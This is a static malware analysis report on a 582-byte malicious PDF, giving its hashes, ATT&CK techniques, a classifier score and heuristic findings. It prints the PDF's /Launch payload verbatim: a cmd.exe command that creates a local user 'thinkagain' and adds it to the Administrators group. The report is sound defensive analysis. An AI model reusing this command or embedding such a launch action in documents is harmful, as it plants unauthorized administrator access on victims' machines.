Malicious PDF — malware analysis report

Static analysis result for SHA-256 5e66200919897ba4…

Verdict: MALICIOUS
File type: PDF
Size: 582 B
MD5: 31e5d0e608fec32a676d833e9a2c6068
SHA-1: 97ba35e255605f4c705c69ab6c78511e49cd7f0c
SHA-256: 5e66200919897ba4b7af28e695a2b48ca33e7a2221d8d44d6cd604c910c879b1
Risk Score: 130

Malware Insights

MITRE ATT&CK
  • T1059.003 Windows Command Shell
  • T1204.002 Malicious File

The PDF file contains a launch action that executes a command to create a new local user named 'thinkagain' with the password 'password' and add it to the Administrators group. This is a clear attempt to establish unauthorized access and elevate privileges on the compromised system.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9998

Heuristics (2)

  • /Launch action target: "cmd.exe" critical PDF_LAUNCH_COMMAND
    PDF /Launch action specifies an executable target with parameters '/q/c net user thinkagain password /add && net localgroup Administrators thinkagain /add" ' — references a known-dangerous executable (cmd, PowerShell, etc.).
  • Launch action high PDF_LAUNCH
    PDF contains a /Launch action with an unresolved or extension-less target — treat as potentially dangerous.